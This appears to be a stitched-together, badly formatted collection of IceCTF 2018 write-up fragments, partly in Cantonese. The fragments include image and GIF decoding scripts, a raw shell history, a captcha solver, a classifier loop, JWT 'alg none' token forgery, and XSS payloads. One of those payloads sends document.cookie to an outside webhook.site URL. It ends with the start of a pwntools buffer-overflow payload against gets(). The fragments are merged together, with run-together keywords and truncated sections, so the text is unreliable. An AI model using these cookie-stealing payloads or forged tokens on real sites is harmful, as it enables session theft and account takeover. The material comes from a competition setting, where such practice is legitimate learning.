flagImage = Image.new('RGB', (1000,1000), "white") im = Image.open('solved.bmp') im = im.convert('RGB')
for x in range(350): for y in range(229): if im.getpixel((x,y)) == (0,0,0): dr = ImageDraw.Draw(flagImage) dr.rectangle(((x,y),(x+5,y+5)), fill="black", outline = "black") flagImage.save("flag2.png")
git exit cd root pwd ls ls -la exit cat /etc/hostname exit cat /etc/hostname exit cat /eyc/hostname cat /etc/hostname echo Centos >> /etc/hostname bash echo Centos > /etc/hostname bash exit cd ~/.i3 cd ~ ls pwd cd .. ls cd .i3 pwd ls -a cd ~/.i3 cd ls ls -a pwd cd .. ls ls -a cd .. ls ls -a cd etc ls ls -a cd i3 ls cd ls ls -a mkdir .i3 ls ls -a ls ls -a cd Documents/ ls mv config ~/.i3 ls cd .. ls ls -a cd .i3 ls cd cd documents cd Documents/ ls cd ls cd .i3 ls sudo subl config cd ls cd Pictures/ ls pwd cd .. ls ls 0a ls -a cd bin ls cd ls cd ls ls -a cd .bashrc sudo subl .bashrc sudo subl .bash_aliases ls brightness ls sudo echo 200 > brightness sudo su cd cd Downloads wget https://gist.githubusercontent.com/Glitch-is/bc49ee73e5413f3081e5bcf5c1537e78/raw/c1f735f7eb36a20cb46b9841916d73017b5e46a3/eRkjLlksZp cd ls sudo subl .bash_aliases backlight brightrness brightness ls cd command-list alias-list alias-list alias-list sudo subl .bashrc sudo subl .bash_aliases i3-config alias-list brightness i3-config alias-list sudo subl .bashrc alias-list sudo subl .bashrc alias-list bash_aliases . ~/.bash_aliases sudo subl .bash_welcome sudo subl .bash_todo alias-list todo to-do edit-todo to-do cd alias-list edit-todo cd Downloads ls -a mv eRkjLlksZp tool.py cat .bash_aliases sudo subl .bash_aliases alias-list cat .bash_aliases ls -a sudo apt-get install libc6:i386 libncurses5:i386 libstdc++6:i386 lib32z1 libbz2-1.0:i386 javac -version sudo apt update apt list --upgradable javac -version sudo apt install oracle-java8-installer javac -version sudo apt install oracle-java8-set-default ls cd bin ls ./studio.sh ls cd android cd Android/ ls cd .. ls cd .. cd ./studio.sh cd .. ls cd .. ls cd /mnt ls cd cd Downloads ./tool.py ../secret > ../hzpxbsklqvboyou ls -a cd .. ls cd usr/ ls cd bin ls ls .. ls cd .. ls cd locals cdlocal ls cd android-studio/ ls cd shred secret ls ls -a sudo subl .bash_aliases android-studio ls ls Documents/ ls cd Documents/ ls cd .. cd Downloads/ rm tool.py ls ls cd ls git sudo apt install git git config --global user.name "skuli" git config --global user.email "sheep.man@fake.com" ls -a cat .gitconfig cd Documents/ ls mkdir projects ls cd projects pwd cd .. cd Downloads/ cd java/ ls cd jre1.8.0_171/ ls cd bin/ ls cd .. cd jre1.8.0_171/ ls cat README cd .. ls cd .. ls cdlocal/ ls cd bin/ ls ls cd 3840x2160/ ls cd .. cd . cd .. ls -al cd .local/ ls cd share/ ls ls cd Write/ ls sudo chmod +x INSTALL ls sudo ./INSTALL sudo chmod -x INSTALL cat INSTALL ls ./Write ls cd .. ls sudo rm write209.tar.gz sudo rm -R Write/ ls cd .. ls ls ls -al grep / "howdy" 2> /dev/null cd .. grep -r "howdy" 2> /dev/null ls /lib/security/ cd /lib/security/ ls ls -al tree cd howdy/ ls ./cli ./cli.py ls exit
defencode(filename): with open(filename, "r") as f: s = f.readline().strip() return base64.b64encode((''.join([chr(ord(s[x])+([5,-1,3,-3,2,15,-6,3,9,1,-3,-5,3,-15] * 3)[x]) for x in range(len(s))])).encode('utf-8')).decode('utf-8')[::-1]*5
if __name__ == "__main__": print(encode(sys.argv[1]))
import requests from bs4 import BeautifulSoup from math import sqrt; from itertools import count, islice import gmpy2
defsolveQuestion(s): if"word in the following line"in s: s = s.replace("\n"," ").replace("."," ").replace(" "," ") num = int(s.split(" ")[3].replace("th","").replace("st","").replace("nd","").replace("rd","")) return s.split(": ")[1].split(" ")[num-1] elif"a prime number"in s: num = int(s.split(" ")[1]) return str(gmpy2.is_prime(num)).lower() elif"What is the greatest common divisor"in s: num1 = int(s.split(" ")[7]) num2 = int(s.split(" ")[9].replace("?", "")) return gmpy2.gcd(num1, num2) elif"Which planet is closest to the sun"in s: return"Mercury" elif"What is the capital of Germany"in s: return"Berlin" elif"How many planets are between Earth and the Sun?"in s: return"2" elif"How many strings does a violin have?"in s: return"4" elif"What is the tallest mountain on Earth?"in s: return"Mount Everest" elif"What year is it?"in s: return"2018" elif"What color is the sky?"in s: return"Blue" elif"Who directed the movie Jaws?"in s: return"Steven Spielberg" elif"What is the capital of Hawaii?"in s: return"Honolulu" else: print s
s = requests.Session() content = s.get("https://43xa7xhkaj0cd8c-anticaptcha.labs.icec.tf/").text soup = BeautifulSoup(content, 'html.parser')
td_tags = soup.find_all("td") answer = []
for i in range(0, len(td_tags), 2): answer.append(str(solveQuestion(td_tags[i].string)))
var updateMap = function() { console.log("updating map"); map.setCenter(currentPos);
// Clear mangos for (var i = 0; i < mangos.length; i++) { mangos[i].setMap(null); } mangos = [];
var user = new google.maps.Marker({ position: currentPos, map: map, icon: 'img/user_marker.png' });
// You're my favorite mango mangos.push(user);
var payload = { lat: currentPos.lat, long: currentPos.lng }
payload["uuid"] = uuid
$.post("http://pokeamango.vuln.icec.tf/mango/list", payload, function(results){ var data = results["mangos"]; for (var i = 0; i < data.length; i++) { var place = data[i];
var mango = new google.maps.Marker({ position: place, map: map, icon: 'img/mangie_marker.png' });
⨅]]⌞⌞⌟[⨆]⌟]]]⨆⨆⨆⌜[[[⌝⌝⌝⌞⌝⌝⌝⌝⨆⌝⌝⌝⌞⌞⌝⌝⌝⌝⌟⌝⌝⨅⨅⌞⌞⨆[]]]⌝⌝⌝⌝]] ⌟ [[[⌝⌝⌝⌝⌟⌝⌝⌝⌝]]]⌞⌞⌞⌝⌝⌝⨆]⌞⌞ THE mag icwordsares queamish os sifrage The magic words are squeamish ossifrage
c = "" for i in range(110): im = Image.open('frame_' + str(i).zfill(3) + '_delay-0.1s.gif') im = im.convert('RGB') for x in range(16): for y in range(16): r,g,b = im.getpixel((y,x)) c += '{:02x}{:02x}{:02x}'.format(r, g, b) with open("ilovebees", "wb") as f: f.write(c.decode('hex')) f.close()
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '2' files = os.listdir("./hotornot") files = [file for file in os.listdir('./hotornot') if file.endswith('.jpg')] files.sort(key= lambda x:int(x[:-4]))
index = 1 # change this as you see fit image_path = sys.argv[1]
# Read in the image_data image_data = tf.gfile.FastGFile(image_path, 'rb').read()
# Loads label file, strips off carriage return label_lines = [line.rstrip() for line in tf.gfile.GFile("/tf_files/retrained_labels.txt")]
# Unpersists graph from file with tf.gfile.FastGFile("/tf_files/retrained_graph.pb", 'rb') as f: graph_def = tf.GraphDef() graph_def.ParseFromString(f.read()) tf.import_graph_def(graph_def, name='')
with tf.Session() as sess: # Feed the image_data as input to the graph and get first prediction softmax_tensor = sess.graph.get_tensor_by_name('final_result:0')
files = os.listdir("./hotornot") files = [file for file in os.listdir('./hotornot') if file.endswith('.jpg')] files.sort(key= lambda x:int(x[:-4])) print files result = "" index = 1 for f in files: result += os.popen("python label_hotnot.py ./hotornot/" + f).read().replace("\n","") print"Status: " + str(index) + " / " + str(len(files)) index += 1 with open("result.txt", "wb") as f: f.write(result) f.close()
#token base64.b64decode('eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0=') #{"typ":"JWT","alg":"none"} base64.b64decode('eyJ1c2VybmFtZSI6ImNhdHBhd24iLCJmbGFnIjoiSWNlQ1RGe2hvcGUgeW91IGRvbid0IHRoaW5rIHRoaXMgaXMgYSByZWFsIGZsYWd9In0==') #{"username":"catpawn","flag":"IceCTF{hope you don\'t think this is a real flag}"}
import base64 base64.b64encode('{"username":"admin","flag":"IceCTF{hope you don\'t think this is a real flag}"}') #eyJ1c2VybmFtZSI6ImFkbWluIiwiZmxhZyI6IkljZUNURntob3BlIHlvdSBkb24ndCB0aGluayB0aGlzIGlzIGEgcmVhbCBmbGFnfSJ9
改完之後發現右上角個username係無變過既 , 留個言試下先啦咁唯有
竟然都係無變過!!! cookies save得唔會冇用掛 , 盡下人事禁埋入去 comment 到睇
竟然變左!! , 咁開始試下構造D xss payload玩弄下個website啦
1 2 3
improt base64 base64.b64encode('{"username":"<script>alert(1)</script>","flag":"IceCTF{hope you don\'t think this is a real flag}"}') #eyJ1c2VybmFtZSI6IjxzY3JpcHQ+YWxlcnQoMSk8L3NjcmlwdD4iLCJmbGFnIjoiSWNlQ1RGe2hvcGUgeW91IGRvbid0IHRoaW5rIHRoaXMgaXMgYSByZWFsIGZsYWd9In0=
但是原來有做 filtering
試下試下發現佢好似扑左都幾多野。結果最後試左呢抽野出黎係work既
1 2 3
import base64 base64.b64encode('{"username":"<img src=x onerror=\'javascript:alert('XSS')\'>","flag":"IceCTF{hope you don\'t think this is a real flag}"}') #eyJ1c2VybmFtZSI6IjxpbWcgc3JjPXggb25lcnJvcj0nJiMxMDYmIzk3JiMxMTgmIzk3JiMxMTUmIzk5JiMxMTQmIzEwNSYjMTEyJiMxMTYmIzU4JiM5NyYjMTA4JiMxMDEmIzExNCYjMTE2JiM0MCYjMzkmIzg4JiM4MyYjODMmIzM5JiM0MSc+IiwiZmxhZyI6IkljZUNURntob3BlIHlvdSBkb24ndCB0aGluayB0aGlzIGlzIGEgcmVhbCBmbGFnfSJ9
import base64 base64.b64encode('{"username":"<img src=x onerror=\'function httpGet(){var xmlHttp = new XMLHttpRequest();xmlHttp.open("GET", "https://webhook.site/928e4501-4b73-4491-a3de-10e0cad789cb?a=" + document.cookie, false );xmlHttp.send( null );}httpGet();\'>","flag":"IceCTF{hope you don\'t think this is a real flag}"}') #eyJ1c2VybmFtZSI6IjxpbWcgc3JjPXggb25lcnJvcj0nJiMxMDImIzExNyYjMTEwJiM5OSYjMTE2JiMxMDUmIzExMSYjMTEwJiMzMiYjMTA0JiMxMTYmIzExNiYjMTEyJiM3MSYjMTAxJiMxMTYmIzQwJiM0MSYjMTIzJiMxMTgmIzk3JiMxMTQmIzMyJiMxMjAmIzEwOSYjMTA4JiM3MiYjMTE2JiMxMTYmIzExMiYjMzImIzYxJiMzMiYjMTEwJiMxMDEmIzExOSYjMzImIzg4JiM3NyYjNzYmIzcyJiMxMTYmIzExNiYjMTEyJiM4MiYjMTAxJiMxMTMmIzExNyYjMTAxJiMxMTUmIzExNiYjNDAmIzQxJiM1OSYjMTIwJiMxMDkmIzEwOCYjNzImIzExNiYjMTE2JiMxMTImIzQ2JiMxMTEmIzExMiYjMTAxJiMxMTAmIzQwJiMzNCYjNzEmIzY5JiM4NCYjMzQmIzQ0JiMzMiYjMzQmIzEwNCYjMTE2JiMxMTYmIzExMiYjMTE1JiM1OCYjNDcmIzQ3JiMxMTkmIzEwMSYjOTgmIzEwNCYjMTExJiMxMTEmIzEwNyYjNDYmIzExNSYjMTA1JiMxMTYmIzEwMSYjNDcmIzU3JiM1MCYjNTYmIzEwMSYjNTImIzUzJiM0OCYjNDkmIzQ1JiM1MiYjOTgmIzU1JiM1MSYjNDUmIzUyJiM1MiYjNTcmIzQ5JiM0NSYjOTcmIzUxJiMxMDAmIzEwMSYjNDUmIzQ5JiM0OCYjMTAxJiM0OCYjOTkmIzk3JiMxMDAmIzU1JiM1NiYjNTcmIzk5JiM5OCYjNjMmIzk3JiM2MSYjMzQmIzMyJiM0MyYjMzImIzEwMCYjMTExJiM5OSYjMTE3JiMxMDkmIzEwMSYjMTEwJiMxMTYmIzQ2JiM5OSYjMTExJiMxMTEmIzEwNyYjMTA1JiMxMDEmIzQ0JiMzMiYjMTAyJiM5NyYjMTA4JiMxMTUmIzEwMSYjMzImIzQxJiM1OSYjMTIwJiMxMDkmIzEwOCYjNzImIzExNiYjMTE2JiMxMTImIzQ2JiMxMTUmIzEwMSYjMTEwJiMxMDAmIzQwJiMzMiYjMTEwJiMxMTcmIzEwOCYjMTA4JiMzMiYjNDEmIzU5JiMxMjUmIzEwNCYjMTE2JiMxMTYmIzExMiYjNzEmIzEwMSYjMTE2JiM0MCYjNDEmIzU5Jz4iLCJmbGFnIjoiSWNlQ1RGe2hvcGUgeW91IGRvbid0IHRoaW5rIHRoaXMgaXMgYSByZWFsIGZsYWd9In0=
<divclass="ribbon pink"></div> <divclass="container"> <divclass="flag center blue white-text"> IceCTF{who_trusts_these_cookies_anyway?} </div> <divclass="row post"> <divclass="col s12"> <divclass="card"> <divclass="card-image"> <imgsrc="/static/img/icectfteam.jpg"> <spanclass="card-title">The First Compiler</span> </div> <aclass="btn-floating btn-large waves-effect waves-light pink comment-btn modal-trigger"href="#comment-modal"data-id="1"><iclass="material-icons">comment</i></a>
<divclass="card-content"> <h5>IceCTF Worked on The First Compiler</h5> <p>It\'s not very commonly known, but the IceCTF actually worked on the first compiler with the famous Grace Hopper</p> <p>The IceCTF team is responsible for a lot of the early achievements in the Computer Science field, not just the first compiler. Duis turpis nisl, accumsan ut pulvinar sit amet, vestibulum id justo. Nunc laoreet urna ut augue pellentesque, non tempus orci maximus. Aenean eget aliquet enim.</p> <p>Sed purus ligula, gravida nec lorem in, vulputate lobortis tortor. Sed blandit rutrum malesuada. Aenean feugiat lectus sit amet lacus dictum sagittis. Nunc interdum justo a felis venenatis molestie. Etiam lacinia mi vitae eros tempus pharetra. Cras a malesuada ex. Vivamus vel est laoreet, facilisis dolor in, porttitor est. Suspendisse in pulvinar ex.</p> </div> </div> </div> </div> </div>
<divclass="ribbon cyan"></div> <divclass="container"> <divclass="row"> <divclass="col s12"> <divclass="card"> <divclass="card-image"> <imgsrc="/static/img/eniac.jpg"> <spanclass="card-title">The ENIAC!</span> </div> <aclass="btn-floating btn-large waves-effect waves-light cyan comment-btn modal-trigger"href="#comment-modal"data-id="2"><iclass="material-icons">comment</i></a> <divclass="card-content"> <h5>The IceCTF Team Created The ENIAC!</h5> <p>Along with the first compiler, the IceCTF also work on creating the very first computer. The ENIAC! </p> <p>There\'s no suprise that the brilliant minds that made one of the most successful hacking competitions in 2018 also were involved with creating what is today known as "the first computer". Although the IceCTF team was not happy with how history decided to name their machine. They opted for the more hip name "puter".</p> <p>Sed purus ligula, gravida nec lorem in, vulputate lobortis tortor. Sed blandit rutrum malesuada. Aenean feugiat lectus sit amet lacus dictum sagittis. Nunc interdum justo a felis venenatis molestie. Etiam lacinia mi vitae eros tempus pharetra. Cras a malesuada ex. Vivamus vel est laoreet, facilisis dolor in, porttitor est. Suspendisse in pulvinar ex.</p> </div> </div> </div> </div> </div>
<footerclass="page-footer grey darken-3"> <divclass="container"> <divclass="row"> <divclass="col l6 s12"> <h5class="white-text">About Me</h5> <pclass="grey-text text-lighten-4">I like blogging about images. I hope you join me on my journey of exploring the world with me!</p> </div> </div> </div> <divclass="footer-copyright"> <divclass="container"> Made with <aclass="brown-text text-lighten-3"href="http://materializecss.com">Materialize</a> </div> </div> </footer>
puts("Sanity Check should be easy"); fflush(_bss_start); gets(&v4); return0; }
Leak Function Address
首先試下點樣可以 trigger main行多次先
1 2 3 4 5 6 7 8 9 10 11 12 13 14
from pwn import *
p = process('sanity') e = ELF('./sanity')
payload = "a"*(0x70+8) payload += p64(gadget) payload += p64(0x401000) #just for fill rdi payload += p64(e.symbols['main']) """ Output: Sanity Check should be easy Sanity Check should be easy """